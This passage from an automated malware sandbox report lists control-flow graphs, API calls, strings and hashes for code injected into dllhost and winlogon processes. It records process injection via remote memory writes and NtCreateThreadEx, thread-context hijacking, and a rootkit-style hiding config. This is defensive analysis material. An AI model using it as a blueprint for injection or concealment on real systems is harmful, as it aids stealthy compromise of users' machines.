                            • 107 1400014cd-1400014e3: OpenProcess → 102, 110
                            • 110 1400014e9-140001501: K32GetModuleFileNameExW → 111, 112
                            • 111 140001503-14000151f: PathFindFileNameW, call 14000447c → 106, 112
                            • 112 140001525-140001544: NtQueryInformationProcess → 114, 115
                            • 114 140001758 → 105
                            • 115 14000154a-14000154e → 114, 117
                            • 117 140001554-140001574: OpenProcessToken → 118, 119
                            • 118 14000157a-14000159b: GetTokenInformation → 120, 121
                            • 119 140001750 → 114
                            • 120 14000161b → 123
                            • 121 14000159d-1400015a6: call 14000e088 → 120, 126
                            • 123 14000161f-14000162d: CloseHandle → 119, 125
                            • 125 140001633-140001639 → 119, 127
                            • 126 1400015a8-1400015ba: LocalAlloc → 120, 128
                            • 127 14000163f-14000164b: call 140001790 → 119, 133
                            • 128 1400015bc-1400015e0: GetTokenInformation → 130, 131
                            • 130 1400015e2-14000160a: GetSidSubAuthorityCount, GetSidSubAuthority, LocalFree → 123
                            • 131 14000160c-140001619: LocalFree → 123
                            • 133 140001651-140001673: VirtualAllocEx → 119, 134
                            • 134 140001679-140001692: WriteProcessMemory → 119, 135
                            • 135 140001698-1400016ad: GetModuleHandleA → 136, 137
                            • 136 1400016c4 → 138
                            • 137 1400016af-1400016c2: GetProcAddress → 138
                            • 138 1400016c7-140001702: NtCreateThreadEx → 119, 139
                            • 139 140001704-14000170c → 119, 140
                            • 140 14000170e-140001711 → 141, 142
                            • 141 140001713-140001718 → 143
                            • 142 14000171a-140001727: WaitForSingleObject → 144, 145
                            • 143 14000174a: CloseHandle → 119
                            • 144 140001745 → 143
                            • 145 140001729-14000173b: GetExitCodeThread → 144, 146
                            • 146 14000173d-140001741 → 144
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Process$Handle$CloseInformationOpenToken$AllocAuthorityFileLocalModuleName$AddressCountErrorFindFreeLastMemoryPathProcQueryVirtualWow64Write_invalid_parameter_noinfo
                            • String ID: @$NtCreateThreadEx$WmiPrvSE.exe$ntdll.dll
                            • API String ID: 2255831085-3049825241
                            • Opcode ID: 47b3d0b3ed36e6396495094337ec394e1caccf78b7f063057fbffef1411bbc00
                            • Instruction ID: 40171889a33b00fbdbaa4a1087c60cb035ef3b8b29c7ed5559afa5d3f01e1a8c
                            • Opcode Fuzzy Hash: 47b3d0b3ed36e6396495094337ec394e1caccf78b7f063057fbffef1411bbc00
                            • Instruction Fuzzy Hash: D78115B5208B8082EB26DF13B8547EA67A1BB8CBC4F444425EF8E57BA4DF79C549C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: NamedPipe$DescriptorDisconnectFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclEntriesLocalReadWrite
                            • String ID: \\.\pipe\nslookchildproc64
                            • API String ID: 3584777297-1363353281
                            • Opcode ID: b37e6f432c6f2a1d5e47efd98d1f3928e00fe339458e3306e41edaff54000244
                            • Instruction ID: 8266934b804761f0116b471cbf32ba5db4d27a63d11a78053db2714d9453cadb
                            • Opcode Fuzzy Hash: b37e6f432c6f2a1d5e47efd98d1f3928e00fe339458e3306e41edaff54000244
                            • Instruction Fuzzy Hash: CF5158B2614B908AE725CF22F8447DA33A4F74CB88F445625FB4A57AA8DF78C148CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 59578552-0
                            • Opcode ID: 43c93713ae73b0e7451d84b403ce93ecb4e66f19edebc87764313757e15ad245
                            • Instruction ID: ff8acf046e0b8ba5d736ac790d6b35c728020170d6d4f3489dfd8d0d71a94e49
                            • Opcode Fuzzy Hash: 43c93713ae73b0e7451d84b403ce93ecb4e66f19edebc87764313757e15ad245
                            • Instruction Fuzzy Hash: 19E012B0E4515185F52FF777BC433ED20912B4E3A5F600215B325473F2CA7A45D24622
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcatlstrcmpilstrcpy
                            • String ID: .text$C:\Windows\System32\
                            • API String ID: 851879939-832442975
                            • Opcode ID: 2565a63028710b063ea01d420fb0ced845f2080497b2aa49b69043651cf8b550
                            • Instruction ID: de66b9a638ad4e6397e737a92eb97871902827a7b6dd6415210a430990ac8e68
                            • Opcode Fuzzy Hash: 2565a63028710b063ea01d420fb0ced845f2080497b2aa49b69043651cf8b550
                            • Instruction Fuzzy Hash: 9C513B76204B8182EB62CF12F4547DAB7A1FB8DBC4F444625EB8A13B68DF38D449CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: __scrt_fastfail$__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2735655165-0
                            • Opcode ID: 07980ee9f757e7180614720c71bfc57c5b69797cca90f1fcb78ae8c300b580c2
                            • Instruction ID: 6224df3126cdcf51118130dc90d299fefb920cbf6a08a6429a847f4dd66625c5
                            • Opcode Fuzzy Hash: 07980ee9f757e7180614720c71bfc57c5b69797cca90f1fcb78ae8c300b580c2
                            • Instruction Fuzzy Hash: C2315CB160064186FA6BEB67F4553EE2391AB4E3C4F854425BB4A0B2F7DE78C9498341
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Basic blocks of 140001d00 (API calls and sub-calls per block; → lists successor blocks):
                            • 253 140001d00-140001d6c: call 140002268 * 2, K32EnumProcesses → 258, 259
                            • 258 140001e72-140001ea8: call 140002224 * 2, call 140002200
                            • 259 140001d72-140001d89 → 261, 262
                            • 261 140001e6a → 258
                            • 262 140001d8f-140001d9f → 264
                            • 264 140001da0-140001dbb: OpenProcess → 266, 267
                            • 266 140001dc1-140001dda: K32EnumProcessModules → 270, 271
                            • 267 140001e4e-140001e54 → 264, 268
                            • 268 140001e5a-140001e62 → 261
                            • 270 140001e45-140001e48: CloseHandle → 267
                            • 271 140001ddc-140001deb → 273, 274
                            • 273 140001ded → 276
                            • 274 140001e40 → 270
                            • 276 140001df0-140001e13: ReadProcessMemory → 277, 278
                            • 277 140001e15-140001e2c → 278, 279
                            • 278 140001e38-140001e3e → 274, 276
                            • 279 140001e2e-140001e36 → 278, 280
                            • 280 140001ea9-140001eb2 → 281, 282
                            • 281 140001eb4-140001ee6 → 270
                            • 282 140001eeb-140001eee → 270
                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Process$Enum$CloseHandleMemoryModulesOpenProcessesRead
                            • String ID:
                            • API String ID: 1213742203-0
                            • Opcode ID: 896a160a0ee285f6e8d8bd3a28e12ab9ce5b7e5b3218f098ad5d1cb74e6b639a
                            • Instruction ID: f6fd842149fe76d569e5107b40fe64d6f9b3009bacd429039626d91551246fa1
                            • Opcode Fuzzy Hash: 896a160a0ee285f6e8d8bd3a28e12ab9ce5b7e5b3218f098ad5d1cb74e6b639a
                            • Instruction Fuzzy Hash: C9513AB261968486EB65DF62F85439AB3A0F789BC0F444125FF8A477A5DF39C541CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: FileHandleType
                            • String ID:
                            • API String ID: 3000768030-0
                            • Opcode ID: 88e8f54f1ce44bcd5c61adcb05f2c06c036122a0376d20a0d62f23662d395c44
                            • Instruction ID: 955487c27205d1d318e8cafe44fec18a402d7959bccc7748bd79d98d32d72b51
                            • Opcode Fuzzy Hash: 88e8f54f1ce44bcd5c61adcb05f2c06c036122a0376d20a0d62f23662d395c44
                            • Instruction Fuzzy Hash: DE31B172615B4481FB76CB16A5907A92A60F349BF0F64031AFFAA0B3F0CB34D4A1C350
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: EnumProcessesSleep
                            • String ID:
                            • API String ID: 4263938415-0
                            • Opcode ID: 2b77bc7fee134ea4cfd489f680b2e42101ab2c75c76b54298c3d5fb89b619286
                            • Instruction ID: 1aac10474dc28f1596d549f3006f364ff74f75de67eb5a76958a3eaa47b5d0ec
                            • Opcode Fuzzy Hash: 2b77bc7fee134ea4cfd489f680b2e42101ab2c75c76b54298c3d5fb89b619286
                            • Instruction Fuzzy Hash: AD11517231465087F726CB13E854B9AB7A1F79DBC4F554214EF8947BA4CB39D501CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: f9e8d53756511d59eebaaf56c323f925c02571bcc974eb49a74ce55441d923b8
                            • Instruction ID: a94002c5647d5c3c02ea8f9a8649a67cf53e66a952d72cc81a498371b09bfe9c
                            • Opcode Fuzzy Hash: f9e8d53756511d59eebaaf56c323f925c02571bcc974eb49a74ce55441d923b8
                            • Instruction Fuzzy Hash: 8C314B72214B8096EB65CB26F8407DE73A4F788794F500226FB9D53BA9DF38C6598B40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: 6185b47001686f3d2c7c36614dcf54a529ba94c280bae09b8bc5057c92ad5623
                            • Instruction ID: 85cb9dd672ade054a5f4c097fae1c78a2e91ee8a46319035c81f3b3cfd1494ad
                            • Opcode Fuzzy Hash: 6185b47001686f3d2c7c36614dcf54a529ba94c280bae09b8bc5057c92ad5623
                            • Instruction Fuzzy Hash: B4D1F2B2708A809AE702CF66E4443DD7BB1F7487D8F544116EF8E57BA9DA38C15AC700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 0dd4a504bcac95c60dc9cd98dc9c14b393eae98d983e4de2bbe092bad3b89234
                            • Instruction ID: df373b6ec730a9bfd404b8efd7c468a6aa4631319b472c9a20adb42830e09c27
                            • Opcode Fuzzy Hash: 0dd4a504bcac95c60dc9cd98dc9c14b393eae98d983e4de2bbe092bad3b89234
                            • Instruction Fuzzy Hash: B8316FB1316A8095FE27DB07B804BE56398B74CBE4F594525EF1AAB7A0EF38D4858700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: 4b28fb120dd779269088581c8e5323345c9365922b55cfb3199524c895469e8a
                            • Instruction ID: ab19db9496d12aa9779ee58175a21b54783d13adca231a0f01b107f525bca11e
                            • Opcode Fuzzy Hash: 4b28fb120dd779269088581c8e5323345c9365922b55cfb3199524c895469e8a
                            • Instruction Fuzzy Hash: 2C115872220B8086F7528B93F84479AB6A0F78CBE4F484224FB5E877B4DF78C9448744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 085014a8c8cfb982fa856900b36fb1a1973ae4baa0dd7c60995248b851b3e67d
                            • Instruction ID: 9859a333bd7b57d9ec38d5dcd9ab6801432730027c79301f89632c4922d5d6c1
                            • Opcode Fuzzy Hash: 085014a8c8cfb982fa856900b36fb1a1973ae4baa0dd7c60995248b851b3e67d
                            • Instruction Fuzzy Hash: BAF0DAB1221A4481FB5ADB92F8843E52360AB4DBD2F541426B60B575B4DE78C5C89710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: 968cc10c74ddc4af2d3d986e3a330590a9d59a8d131bfa39f0543e3baa1f8aad
                            • Instruction ID: 4d66de13f1315c420de4639c2bc0a19256bd87756d4b344f67744beb2c30b217
                            • Opcode Fuzzy Hash: 968cc10c74ddc4af2d3d986e3a330590a9d59a8d131bfa39f0543e3baa1f8aad
                            • Instruction Fuzzy Hash: 9B819BB2620A5089FB62DF66E8907EC66A1FB4CBD8F444116FF0A677F6EB358445C310
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: 3c234b152ff464f4ff42ef9096345955c09007f11b3e64a1b63be97e3aa2707f
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: C31173F2A75A0201F666D326F4657FD10436B6D3F4F445635BB6B077F6CA3498418112
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: 01165759b3121519fe1ef140df1b2a9b00668b61944ea1a8fdd598fc9298aa1e
                            • Instruction ID: ee40bbe069c6a25a0cbd135e97ebc073c2ba55ff1da5d0fc5055a9fc3e7fc3ba
                            • Opcode Fuzzy Hash: 01165759b3121519fe1ef140df1b2a9b00668b61944ea1a8fdd598fc9298aa1e
                            • Instruction Fuzzy Hash: E611B2B031164486FA67D723B8443E972A9AB4DBE0F184625BF65173F6DF38C8458301
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: f02c9b90154e3edead2ad0a942b96358295ea216c40d1ad9c1893ef4f954e687
                            • Instruction ID: d6c2a18bdce53c2565363804d56b9cf82c27b3c0d25e7440da819e00cd40361f
                            • Opcode Fuzzy Hash: f02c9b90154e3edead2ad0a942b96358295ea216c40d1ad9c1893ef4f954e687
                            • Instruction Fuzzy Hash: 14417EB2714A8086EB61CF66F8443EA67A1F798BD4F844021EF8D877A8EB78C541C741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 87c15fbfbe1f05f64aa5430951cf9ece01d7109a62245abce51aa716bae92111
                            • Instruction ID: 7c7dd02c59062fbcd058de3468e813ba5fe1cfadeba575b480b347c667b96169
                            • Opcode Fuzzy Hash: 87c15fbfbe1f05f64aa5430951cf9ece01d7109a62245abce51aa716bae92111
                            • Instruction Fuzzy Hash: 5611F276608B8086D761CB56B48039AB7A5F7CDBD4F54412AEBCD93B29CF38C5508B00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 94dd1620c46a63ff53a984a68cffc85d02668d10d329063844b3c401576966c7
                            • Instruction ID: d4865f86d63233cf226d7616b7dbd200fe063830735e82a08e6ff91255043838
                            • Opcode Fuzzy Hash: 94dd1620c46a63ff53a984a68cffc85d02668d10d329063844b3c401576966c7
                            • Instruction Fuzzy Hash: 55111C76214B8082EB66CF16F54039977A5F788BD4F588225EF8D17768DF39C5518B00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: bea0c99d7b61f4679e5d56e735bc41edd173cbad7924a7fb1748e672ffa4f4fd
                            • Instruction ID: f86814be835adc1224f50372284a3323bcf6b4697b5421914438eaaf748fc347
                            • Opcode Fuzzy Hash: bea0c99d7b61f4679e5d56e735bc41edd173cbad7924a7fb1748e672ffa4f4fd
                            • Instruction Fuzzy Hash: D8F058B5714B9092EB06CB53B4407DA3661AB4CBC0F889025FB4927B65CF39C985C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: cc01e7479c4e8cb8aaf6d6675b111d4cd518f7e83ee88a77bed60041685dfe4d
                            • Instruction ID: 854e1f8098dbbf26dcbba5b03f58f1f5fd216598f3386bee41b5debbdfa3cd0a
                            • Opcode Fuzzy Hash: cc01e7479c4e8cb8aaf6d6675b111d4cd518f7e83ee88a77bed60041685dfe4d
                            • Instruction Fuzzy Hash: 02E06DF120468081FB0ADB66F8403D92222A74C7C0F589022FB452B6B5CE39C985C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:1.8%
                            Dynamic/Decrypted Code Coverage:98.4%
                            Signature Coverage:0%
                            Total number of Nodes:365
                            Total number of Limit Nodes:15
15932->15933 15934 1afddd064cb 15933->15934 15935 1afddd06547 VirtualProtect 15933->15935 15936 1afddd06581 15935->15936 15937 1afddd06573 GetLastError 15935->15937 15937->15936

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CloseOpen$Concurrency::cancel_current_taskEnumInfoQueryValuelstrcmpilstrlen
                            • String ID: SOFTWARE\nslookconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                            • API String ID: 2205723969-4286660177
                            • Opcode ID: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction ID: 8c2aaf5fa55622d345902602c6cf8af45a2de01cd9d8aa887a80494d114403f5
                            • Opcode Fuzzy Hash: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction Fuzzy Hash: 8DC15872712B11C6EB11DFE2E8503AD77B8F789B88F018029DA8947B99DF78C45AC741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CurrentFileModuleNameProcessProtectVirtual$CreateFindHandlePathThread_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 2570614652-925916808
                            • Opcode ID: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction ID: 5ecd2b039eb19bca009c9e3db2dca814974c2c340eda80d35b49e607686de3bf
                            • Opcode Fuzzy Hash: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction Fuzzy Hash: 30416F7174774181FF669BE1F8447A626A9E786B48F04403DD949467D8EF3DC00E9742
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            [Control-flow graph for the function at 1afddd06a40 (basic blocks 1afddd06a40 to 1afddd06ed6; Executed/Not Executed node list omitted). APIs called: GetCurrentThreadId, GetThreadContext, SetThreadContext, VirtualProtect, FlushInstructionCache, ResumeThread.]
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Thread$Current$Context
                            • String ID:
                            • API String ID: 1666949209-0
                            • Opcode ID: 1dc33039a22eabbeebcab3339823ceb6ead82d8cbd5b34bc2700be86ad712db4
                            • Instruction ID: 88e4d1ff00525c66c1d13cf890266a8f114de126a86606a9f95001ab7e93b2fa
                            • Opcode Fuzzy Hash: 1dc33039a22eabbeebcab3339823ceb6ead82d8cbd5b34bc2700be86ad712db4
                            • Instruction Fuzzy Hash: 1BD1EE76306B8882DF71DB95E4913AA77A4F3C9B88F10412AEA8D477A5CF3CC549DB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            [Control-flow graph for the function at 1afddd05fe0 (basic blocks 1afddd05fe0 to 1afddd065ea; Executed/Not Executed node list omitted). APIs called: GetCurrentThreadId, VirtualProtect, GetLastError.]
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 77b0e61026dcb1cbe9ffaeb6768d5842275e70ce13d5836d784ec2967e2859dc
                            • Instruction ID: fa25290cde449c2035e164aaea8dd913c4daef40ef9751952fc41bf151f0e6d4
                            • Opcode Fuzzy Hash: 77b0e61026dcb1cbe9ffaeb6768d5842275e70ce13d5836d784ec2967e2859dc
                            • Instruction Fuzzy Hash: 2702033221AB8086DB61CB95F4557AAB7B4F3C5784F104029EB8E87BA9DF7CC449DB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Virtual$AllocQuery
                            • String ID:
                            • API String ID: 31662377-0
                            • Opcode ID: 1d8c233d6227d2e299d15bdeac6b71acf21758d515661483862986c49184b7ec
                            • Instruction ID: a9395169232f802f892956596497334a0496ede1b8f251cddf5b8ebc68a6df38
                            • Opcode Fuzzy Hash: 1d8c233d6227d2e299d15bdeac6b71acf21758d515661483862986c49184b7ec
                            • Instruction Fuzzy Hash: 2731F232717A8181EE72DAD5F0507AE6298F3C978CF10053DE5CD46BD8DB6CC54A9B05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                            • String ID:
                            • API String ID: 3733156554-0
                            • Opcode ID: 2e14d6d64783aa5e808863a58a0602ed5772b49a50541b1fc1cd05cb292e8779
                            • Instruction ID: 6b91a2006ce2e2279d3f1458f23f4396ab72add255b911aa9453f53521d80637
                            • Opcode Fuzzy Hash: 2e14d6d64783aa5e808863a58a0602ed5772b49a50541b1fc1cd05cb292e8779
                            • Instruction Fuzzy Hash: DBF03636317B4480DA31DB81F04479A67A4E3C9BD8F14012AF98D03BA9CA3CC29A9B41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            [Control-flow graph for the function at 1afddcd35d0 (basic blocks 1afddcd35d0 to 1afddcd38e6; Executed/Not Executed node list omitted). APIs called: VirtualAlloc, LoadLibraryA (in a loop).]
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508622976.000001AFDDCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDCD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddcd0000_winlogon.jbxd
                            Similarity
                            • API ID: AllocLibraryLoadVirtual
                            • String ID:
                            • API String ID: 3550616410-0
